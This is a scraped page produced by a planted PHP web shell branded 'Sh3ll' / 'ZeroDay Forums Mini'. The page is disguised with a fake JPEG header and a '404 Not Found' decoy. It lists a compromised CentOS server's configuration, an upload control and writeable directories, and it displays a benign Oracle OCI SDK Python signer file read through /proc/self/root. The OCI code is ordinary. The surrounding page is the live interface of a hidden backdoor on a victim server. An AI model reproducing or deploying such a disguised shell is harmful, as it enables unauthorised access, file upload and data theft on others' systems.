����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /proc/self/root/usr/share/mysqlsh/oci_sdk/oci/auth/signers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/self/root/usr/share/mysqlsh/oci_sdk/oci/auth/signers/ephemeral_resource_principals_signer.py
# coding: utf-8
# Copyright (c) 2016, 2020, Oracle and/or its affiliates. All rights reserved.

import threading
import oci
import os
from .security_token_signer import SecurityTokenSigner, SECURITY_TOKEN_FORMAT_STRING
from ..security_token_container import SecurityTokenContainer


class EphemeralResourcePrincipalSigner(SecurityTokenSigner):
    def __init__(self, session_token=None, private_key=None, private_key_passphrase=None, region=None):
        """
        This signer takes the following parameters:
        - session_token
        - private_key
        - private_key_passphrase

            These three parameters may be used in one of two modes. In the first mode, they contain the actual
            contents of the Resource Pricipals Session Token, private key (in PEM format) and the passphrase. This mode is only useful for
            short-lived programs.

            In the second mode, if these parameters contain absolute paths, then those paths are taken as the
            on-filesystem location of the values in question. The signer may attempt to reload these values from
            the filesystem on receiving a 401 response from an OCI service. This mode is used in cases where the
            program executes in an environment where an external provider may inject updated tokens into
            the filesystem.

        - region: the canonical region name

            This is utilised in locating the "local" endpoints of services.
        """

        self._reset_signers_lock = threading.Lock()
        self.region = self._initialize_and_return_region(region)
        self._rpst = session_token
        if self._rpst is None:
            raise ValueError("session_token was not provided")

        # Load the initial values
        self.session_key_supplier = self._construct_session_key_supplier(private_key, private_key_passphrase)
        self.security_token = SecurityTokenContainer(self.session_key_supplier,
                                                     self._get_resource_principal_session_token())

        # After load, the RPST holds claims for tenancy and compartment.
        self._reset_claims()

        # Get the Resource Principal Session Token and use it to set up the signer
        super(EphemeralResourcePrincipalSigner, self).__init__(self.security_token.security_token,
                                                               self.session_key_supplier.get_key_pair()['private'])

    def _initialize_and_return_region(self, region_raw=None):
        if hasattr(self, 'region'):
            return self.region

        if region_raw is None:
            return None

        # The region should be something like "us-phoenix-1" but if we get "phx" then convert it.
        if region_raw in oci.regions.REGIONS_SHORT_NAMES:
            self.region = oci.regions.REGIONS_SHORT_NAMES[region_raw]
        else:
            self.region = region_raw

        return self.region

    def _construct_session_key_supplier(self, private_key=None, private_key_passphrase=None):
        if private_key is None:
            raise ValueError("private_key must be provided")
        passphrase = private_key_passphrase
        if os.path.isabs(private_key):
            return FileBasedSessionKeySupplier(private_key, passphrase)
        else:
            return FixedSessionKeySupplier(oci.signer.load_private_key(private_key, passphrase))

    def get_security_token(self):
        if hasattr(self, 'security_token'):
            if self.security_token.valid_with_jitter():
                return self.security_token.security_token

        return self._refresh_security_token_inner()

    def refresh_security_token(self):
        return self._refresh_security_token_inner()

    def _refresh_security_token_inner(self):
        self._reset_signers_lock.acquire()
        try:
            self.session_key_supplier.refresh()

            # Load RPST
            self.security_token = SecurityTokenContainer(self.session_key_supplier,
                                                         self._get_resource_principal_session_token())
            self._reset_signers()

            # Resources may be moved between compartments. Update any coordinates on refresh.
            self._reset_claims()
            return self.security_token.security_token
        finally:
            self._reset_signers_lock.release()

    def _get_resource_principal_session_token(self):
        """
        Get the Resource Principal Session Token
        """
        if os.path.isabs(self._rpst):
            with open(self._rpst) as f:
                return f.read()
        else:
            return self._rpst

    def _reset_signers(self):
        self.api_key = SECURITY_TOKEN_FORMAT_STRING.format(self.security_token.security_token)
        self.private_key = self.session_key_supplier.get_key_pair()['private']

        self._basic_signer.reset_signer(self.api_key, self.private_key)
        self._body_signer.reset_signer(self.api_key, self.private_key)

    def _reset_claims(self):
        self.tenancy_id = self.get_claim("res_tenant")
        self.compartment_id = self.get_claim("res_compartment")

    def get_claim(self, claim):
        """
        Provide access to the claims on the session token
        """
        return self.security_token.get_jwt().get(claim)


class FixedSessionKeySupplier(object):
    """FixedSessionKeySupplier holds a fixed session key that never updates"""
    def __init__(self, private_key=None):
        """
        A supplier that vends a single fixed private and public key.

        :param private_key:
            The private key to use.
        """
        self.private_key = private_key
        self.public_key = private_key.public_key()

    def get_key_pair(self):
        return {'private': self.private_key, 'public': self.public_key}

    def refresh(self):
        pass


class FileBasedSessionKeySupplier(object):
    """FileBasedSessionKeySupplier holds a private key that's loaded (and potentially refreshed) from a file source.

    :param private_key_file:
        The location to read the private key from

    :param passphrase_file (optional):
        The location to read the associated passphrase from
    """
    def __init__(self, private_key_file=None, passphrase_file=None):
        """
        A supplier that vends a private and public key loaded from a location on the filesystem

        :param private_key:
            The private key to use.
        """
        self.private_key_file = private_key_file
        self.passphrase_file = passphrase_file
        self.private_key = self.public_key = None
        self._refresh_lock = threading.Lock()

        self.refresh()

    def get_key_pair(self):
        return {'private': self.private_key, 'public': self.public_key}

    def refresh(self):
        pass_phrase = None
        if self.passphrase_file is not None:
            with open(self.passphrase_file, "b") as f:
                pass_phrase = f.read()
        self.private_key = oci.signer.load_private_key_from_file(self.private_key_file, pass_phrase)
        self.public_key = self.private_key.public_key()

ZeroDay Forums Mini